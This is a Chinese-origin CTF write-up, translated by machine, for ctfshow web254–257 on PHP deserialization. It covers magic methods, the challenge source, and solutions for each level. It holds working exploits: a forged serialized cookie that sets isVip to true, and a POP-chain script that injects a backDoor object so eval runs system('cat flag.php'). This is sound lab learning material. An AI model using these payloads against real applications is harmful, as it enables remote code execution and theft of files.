当前位置：网站首页>[ctfshow web] deserialization

[ctfshow web] deserialization

2022-07-26 16:58:00 【narukuuuu】

Knowledge reserve

PHP Magic variables in ：

__sleep() // perform serialize() when , This function will be called first
__wakeup() // Will be called immediately after deserialization （ When the number of variables during deserialization is inconsistent with the actual number, bypass ）
__construct() // When the object is created , Will trigger initialization
__destruct() // Triggered when an object is destroyed
__toString()： // Triggered when an object is used as a string
__call() // Triggering an invocable method in an object context
__callStatic() // Triggering an invocable method in a static context
__get() // Call when you get a member variable of a class , Used to read data from inaccessible properties （ Inaccessible properties include ：1. Property is private .2. Member variables that do not exist in the class ）
__set() // Used to write data to an inaccessible property
__isset() // Called on an inaccessible property isset() or empty() Trigger
__unset() // Use on inaccessible properties unset() Trigger when
__toString() // Triggered when a class is used as a string
__invoke() // When trying to call an object as a function

Serializing objects ：

private The variable will be serialized as ：\x00 Class name \x00 Variable name
protected The variable will be serialized as : \x00*\x00 Variable name
public The variable will be serialized as ： Variable name

web254

<?php

/* # -*- coding: utf-8 -*- # @Author: h1xa # @Date: 2020-12-02 17:44:47 # @Last Modified by: h1xa # @Last Modified time: 2020-12-02 19:29:02 # @email: [email protected] # @link: https://ctfer.com */

error_reporting(0);
highlight_file(__FILE__);
include('flag.php');

class ctfShowUser{
    
    public $username='xxxxxx';
    public $password='xxxxxx';
    public $isVip=false;

    public function checkVip(){
    
        return $this->isVip;
    }
    public function login($u,$p){
    
        if($this->username===$u&&$this->password===$p){
    
            $this->isVip=true;
        }
        return $this->isVip;
    }
    public function vipOneKeyGetFlag(){
    
        if($this->isVip){
    
            global $flag;
            echo "your flag is ".$flag;
        }else{
    
            echo "no vip, no flag";
        }
    }
}

$username=$_GET['username'];
$password=$_GET['password'];

if(isset($username) && isset($password)){
    
    $user = new ctfShowUser();
    if($user->login($username,$password)){
    
        if($user->checkVip()){
    
            $user->vipOneKeyGetFlag();
        }
    }else{
    
        echo "no vip,no flag";

This doesn't seem to be reflected in deserialization , I have learned about classes , Function call
structure payload:

?username=xxxxxx&password=xxxxxx

Insert picture description here

web255

<?php

/* # -*- coding: utf-8 -*- # @Author: h1xa # @Date: 2020-12-02 17:44:47 # @Last Modified by: h1xa # @Last Modified time: 2020-12-02 19:29:02 # @email: [email protected] # @link: https://ctfer.com */

error_reporting(0);
highlight_file(__FILE__);
include('flag.php');

class ctfShowUser{
    
    public $username='xxxxxx';
    public $password='xxxxxx';
    public $isVip=false;

    public function checkVip(){
    
        return $this->isVip;
    }
    public function login($u,$p){
    
        return $this->username===$u&&$this->password===$p;
    }
    public function vipOneKeyGetFlag(){
    
        if($this->isVip){
    
            global $flag;
            echo "your flag is ".$flag;
        }else{
    
            echo "no vip, no flag";
        }
    }
}

$username=$_GET['username'];
$password=$_GET['password'];

if(isset($username) && isset($password)){
    
    $user = unserialize($_COOKIE['user']);    
    if($user->login($username,$password)){
    
        if($user->checkVip()){
    
            $user->vipOneKeyGetFlag();
        }
    }else{
    
        echo "no vip,no flag";
    }
}

First, get the object by deserialization ( Serialization saves objects to strings , Deserialization restores a string to an object ), It can be found from cookie Of user In the middle of payload Instantiation string , after checkVip The requirement is true, After performing vipOneKeyGetFlag obtain flag
because cookie Lieutenant general " As a truncation symbol , The required code bypasses , use url code

<?php
class ctfShowUser{
    
    public $isVip=true;
}
$a= serialize(new ctfShowUser());
echo urlencode($a);
?>

obtain cookie Of payload:

O%3A11%3A%22ctfShowUser%22%3A1%3A%7Bs%3A5%3A%22isVip%22%3Bb%3A1%3B%7D

Grab the bag ,get Biography and reference cookie Pass in user
Insert picture description here
obtain flag.

web256

and web255 There's no difference , But ask for username and password Dissimilarity .

web257

<?php

/* # -*- coding: utf-8 -*- # @Author: h1xa # @Date: 2020-12-02 17:44:47 # @Last Modified by: h1xa # @Last Modified time: 2020-12-02 20:33:07 # @email: [email protected] # @link: https://ctfer.com */

error_reporting(0);
highlight_file(__FILE__);

class ctfShowUser{
    
    private $username='xxxxxx';
    private $password='xxxxxx';
    private $isVip=false;
    private $class = 'info';

    public function __construct(){
    
        $this->class=new info();
    }
    public function login($u,$p){
    
        return $this->username===$u&&$this->password===$p;
    }
    public function __destruct(){
    
        $this->class->getInfo();
    }

}

class info{
    
    private $user='xxxxxx';
    public function getInfo(){
    
        return $this->user;
    }
}

class backDoor{
    
    private $code;
    public function getInfo(){
    
        eval($this->code);
    }
}

$username=$_GET['username'];
$password=$_GET['password'];

if(isset($username) && isset($password)){
    
    $user = unserialize($_COOKIE['user']);
    $user->login($username,$password);
}

analysis ：
1) Code audit first , Haven't seen flag Output place , But in class backDoor See in eval, It should be read in conjunction with command execution flag The file .ctfShowUser Class destruct Medium $this->calss->getInfo(), that backDoor Medium $code It's a variable , It's something we can control .

2) Nesting classes in classes , It needs to be initialized , utilize __construct() To initialize ,__construct Automatically call when the object is created , Initialize the object . When all operations are completed , Serialized objects need to be released , Trigger __destruct() Magic methods
So we just need to execute __construct Initialization when backDoor class , Facilitate the use of command execution , After that, after deserialization , Will execute __destruct(), here eval($this->code).

exp:

<?php
class ctfShowUser{
    
	private $username= '1';
	private $password= '1';
	private $isVip= false;
	private $class;
	
	   public function __construct(){
    
		 $this->class=new backDoor();
	 }
	
	 
}
class backDoor{
    
	private $code="system('cat flag.php');";
	
}
$b=new ctfShowUser();
echo urlencode(serialize($b));
?>
}